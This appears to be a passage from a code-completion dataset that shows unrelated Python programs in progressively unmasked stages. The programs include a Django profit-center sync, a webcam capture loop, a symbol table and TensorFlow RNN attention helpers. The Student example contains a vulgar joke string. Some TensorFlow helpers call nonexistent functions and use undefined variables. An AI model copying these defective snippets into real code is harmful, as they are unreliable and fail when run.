"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport logging\nfrom django.db import transaction\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.db import transaction\n\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\n\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(\n ralph3_id=pc['id'],\n defaults=dict(\n name=pc['name'],\n )\n )\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph(\"profit-centers\", logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(\n new_pc,\n total - new_pc,\n total,\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""
- Define a new class Student which is derived from Human and has:
grade field.
do_hobby - print 'dancing' or some another hobby
"""
import andy.Lesson_7.exercise_1
class Student(andy.Lesson_7.exercise_1.Human):
def __init__(self, firstname, lastname, grade):
super().__init__(firstname, lastname)
self.grade = grade
def do_hobby(self):
return self.full_name + " ebet Petra Kovarskogo"
a = Student("Artem", "Nizhnik", "Shkolnik")
print(a.do_hobby())
print(a.grade)
|
normal
|
{
"blob_id": "497f56891670f635feff983058e86055e54be493",
"index": 2618,
"step-1": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\n<mask token>\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-3": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\na = Student('Artem', 'Nizhnik', 'Shkolnik')\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-4": "<mask token>\nimport andy.Lesson_7.exercise_1\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\na = Student('Artem', 'Nizhnik', 'Shkolnik')\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-5": "\"\"\"\n- Define a new class Student which is derived from Human and has:\n grade field.\n do_hobby - print 'dancing' or some another hobby\n\"\"\"\nimport andy.Lesson_7.exercise_1\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + \" ebet Petra Kovarskogo\"\n\n\na = Student(\"Artem\", \"Nizhnik\", \"Shkolnik\")\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float("inf")
for cls in data:
total = sum([len(val) for val in data.values()])
print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
minimum = min([len(data[cls]), minimum])
# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")
# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
normal
|
{
"blob_id": "41e642c4acb212470577ef43908a1dcf2e0f5730",
"index": 7159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n<mask token>\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-3": "<mask token>\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-4": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-5": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\n\n\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob(\"./input/**/*.xml\", recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n\nminimum = float(\"inf\")\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\")\n minimum = min([len(data[cls]), minimum])\n\n# Extract images\nextract_images_from_bbox_dict_for_training(images, output_dir=\"./data/\")\n\n# Split into dataset\nsplit_dataset(\"./data/*\", max_size=minimum, except_for_train=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import cv2
# open webcam (웹캠 열기)
webcam = cv2.VideoCapture(0)
if not webcam.isOpened():
print("Could not open webcam")
exit()
sample_num = 0
captured_num = 0
# loop through frames
while webcam.isOpened():
# read frame from webcam
status, frame = webcam.read()
sample_num = sample_num + 1
if not status:
break
# display output
cv2.imshow("captured frames", frame)
if sample_num == 4:
captured_num = captured_num + 1
cv2.imwrite('./images/img'+str(captured_num)+'.jpg', frame)
sample_num = 0
# press "Q" to stop
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# release resources
webcam.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "856a27e953a6b4e1f81d02e00717a8f95a7dea5f",
"index": 7790,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\n<mask token>\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nwebcam = cv2.VideoCapture(0)\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\nsample_num = 0\ncaptured_num = 0\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nwebcam = cv2.VideoCapture(0)\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\nsample_num = 0\ncaptured_num = 0\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\n \n# open webcam (웹캠 열기)\nwebcam = cv2.VideoCapture(0)\n \nif not webcam.isOpened():\n print(\"Could not open webcam\")\n exit()\n \n \nsample_num = 0 \ncaptured_num = 0\n \n# loop through frames\nwhile webcam.isOpened():\n \n # read frame from webcam \n status, frame = webcam.read()\n sample_num = sample_num + 1\n \n if not status:\n break\n \n # display output\n cv2.imshow(\"captured frames\", frame)\n \n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img'+str(captured_num)+'.jpg', frame)\n sample_num = 0\n \n \n # press \"Q\" to stop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# release resources\nwebcam.release()\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
class Symbol(object):
pass
class Fundef(Symbol):
def __init__(self, name, type, args):
self.name = name
self.type = type
self.args = args
class VariableSymbol(Symbol):
def __init__(self, name, type):
self.name = name
self.type = type
class Scope(object):
def __init__(self, parent, name):
self.parent = parent
self.name = name
self.entries = dict()
def put(self, name, symbol):
self.entries[name] = symbol
def get(self, name):
return self.entries[name]
def has_entry(self, name):
return self.entries.has_key(name)
def name(self):
return self.name
class SymbolTable(object):
def __init__(self, scope_name):
root_scope = Scope(None, scope_name)
self.scopes = dict()
self.scopes[scope_name] = root_scope
self.scope = root_scope
def push_scope(self, scope_name):
if not self.scopes.has_key(scope_name):
self.scopes[scope_name] = Scope(self.scope, scope_name)
self.set_scope(scope_name)
def pop_scope(self):
self.set_scope(self.scope.parent.name)
def set_scope(self, scope_name):
if self.scopes.has_key(scope_name):
self.scope = self.scopes[scope_name]
def put(self, name, symbol):
self.scopes[self.scope.name].put(name, symbol)
def get(self, name, scope=None):
scope_name = scope.name if scope != None else self.scope.name
if self.exists(name, scope=scope):
return self.scopes[scope_name].get(name)
def exists(self, name, scope=None):
scope_name = scope.name if scope != None else self.scope.name
return self.scopes[scope_name].has_entry(name)
def scope_exists(self, scope_name):
return self.scopes.has_key(scope_name)
def current_scope(self):
return self.scope.name
def find(self, name):
scope = self.scope
while scope != None:
if self.exists(name, scope=scope):
return self.get(name, scope=scope)
scope = scope.parent
def __str__(self):
s = ""
for scope_name, scope in self.scopes.iteritems():
s += str(scope_name) + ':\n'
for entry in scope.entries:
s += '\t' + str(entry) + ': ' + str(scope.entries[entry])
return s
|
normal
|
{
"blob_id": "6cc23e370d1ec1e3e043c3fa6819f9166b6e3b40",
"index": 4434,
"step-1": "<mask token>\n\n\nclass Scope(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-2": "<mask token>\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n <mask token>\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-3": "<mask token>\n\n\nclass VariableSymbol(Symbol):\n <mask token>\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-4": "<mask token>\n\n\nclass Fundef(Symbol):\n\n def __init__(self, name, type, args):\n self.name = name\n self.type = type\n self.args = args\n\n\nclass VariableSymbol(Symbol):\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-5": "#!/usr/bin/python\n\n\nclass Symbol(object):\n pass\n\n\nclass Fundef(Symbol):\n\n def __init__(self, name, type, args):\n self.name = name\n self.type = type\n self.args = args\n\n\nclass VariableSymbol(Symbol):\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = \"\"\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-ids": [
14,
17,
19,
22,
24
]
}
|
[
14,
17,
19,
22,
24
] |
import math,random,numpy as np
def myt():
x=[0]*10
y=[]
for i in range(100000):
tmp = int(random.random()*10)
x[tmp] = x[tmp]+1
tmpy=[0]*10
tmpy[tmp] = 1
for j in range(10):
tmpy[j] = tmpy[j] + np.random.laplace(0,2,None)
y.append(tmpy)
result=[0]*10
for i in range(10):
for j in range(100000):
result[i] = result[i]+y[j][i]
print x
print result
if __name__ == '__main__':
myt()
|
normal
|
{
"blob_id": "7b7705cdaa8483f6abbc3f4fb3fa1ca506742da8",
"index": 6042,
"step-1": "import math,random,numpy as np\n\ndef myt():\n x=[0]*10\n y=[]\n for i in range(100000):\n tmp = int(random.random()*10)\n x[tmp] = x[tmp]+1\n tmpy=[0]*10\n tmpy[tmp] = 1\n for j in range(10):\n tmpy[j] = tmpy[j] + np.random.laplace(0,2,None)\n y.append(tmpy)\n result=[0]*10\n for i in range(10):\n for j in range(100000):\n result[i] = result[i]+y[j][i]\n print x\n print result\n\nif __name__ == '__main__':\n myt()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
print('Boolean Exercise')
print(False or False)
print(False and False)
print(not True or not False)
|
normal
|
{
"blob_id": "2385882f040ef4bd0a3611bebfbb2ae5b3cd1dc6",
"index": 4204,
"step-1": "<mask token>\n",
"step-2": "print('Boolean Exercise')\nprint(False or False)\nprint(False and False)\nprint(not True or not False)\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import tensorflow as tf
from rnn_cells import gru_cell, lstm_cell
from tensorflow.python.ops import rnn
def shape_list(x):
ps = x.get_shape().as_list()
ts = tf.shape(x)
return [ts[i] if ps[i] is None else ps[i] for i in range(len(ps))]
def bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):
with tf.variable_scope(scope) as sc:
# forward pass
hs_fw = []
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')
hs_fw.append(h_fw)
# backward pass
hs_bw = []
for idx, x in enumerate(tf.reversed(X)):
if idx > 0:
sc.reuse_variables()
h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')
hs_bw.append(h_bw)
# stack outputs
hs_fw = tf.stack(hs_fw)
hs_bw = tf.reversed(tf.stack(hs_bw), 0)
# concat outputs and states
X = tf.concat((hs_fw, hs_bw), 2)
c = tf.concat((c_fw, c_bw), 1)
h = tf.concat((h_fw, h_bw), 1)
return X, c, h
def bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):
with tf.variable_scope(scope) as sc:
# forward pass
hs_fw = []
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
h_fw = gru_cell(x, h_fw, 'fw_gru_cell')
hs_fw.append(h_fw)
# backward pass
hs_bw = []
for idx, x in enumerate(reversed(X)):
if idx > 0:
sc.reuse_variables()
h_bw = gru_cell(x, h_bw, 'bw_gru_cell')
hs_bw.append(h_bw)
# stack outputs
hs_fw = tf.stack(hs_fw)
hs_bw = tf.reversed(tf.stack(hs_bw), 0)
# concat outputs and states
X = tf.concat((hs_fw, hs_bw), 2)
h = tf.concat((h_fw, h_bw), 1)
return X, h
def stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):
with tf.variable_scope(scope) as sc:
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
# handle the stack of lstm_cells
for i in range(depth):
h, c = lstm_cell(x, cs[i], hs[i], units, scope="cell_%d" % i)
# add residual connections after specified depth
if i >= non_res_depth:
x = h + x
cs[i] = c
hs[i] = h
X[idx] = h
return X, cs, hs
def stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):
with tf.variable_scope(scope) as sc:
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
# hande the stack of lstm_cells
for i in range(depth):
h, c = gru_cell(x, hs[i], units, scope="cell_%d" % i)
# add residual connections after specified depth
if i >= non_res_depth:
x = h + x
hs[i] = h
X[idx] = h
return X, hs
def _luong_attn(h, e_out_W, e_out):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])
a = tf.nn.softmax(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])
return ctx
def _bahdanau_attn(h, e_out_W, e_out):
w_q_attn = tf.get_variable("w_q_attn", [units, units], initializer=tf.random_normal_initializer(stddev=0.02))
v = tf.get_variable("attn_v", [units], dtype=dtype)
h = tf.maxmul(h, w_q_attn)
return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])
def _simple_norm(inp, axis=1):
return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)
def _temp_attn(h, e_out_W, e_out, score_sum, time):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])
score = tf.cond(time > 0, lambda: tf.exp(score)/(score_sum+1e-12), lambda: tf.exp(score))
a = _simple_norm(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])
return ctx, score_sum + score
def _dec_attn(h, d_hsW, d_hs):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=True), [1])
a = tf.nn.softmax(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])
return ctx
|
normal
|
{
"blob_id": "e550a2d46e46f0e07d960e7a214fbaa776bab0d5",
"index": 4697,
"step-1": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\n<mask token>\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\n<mask token>\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = 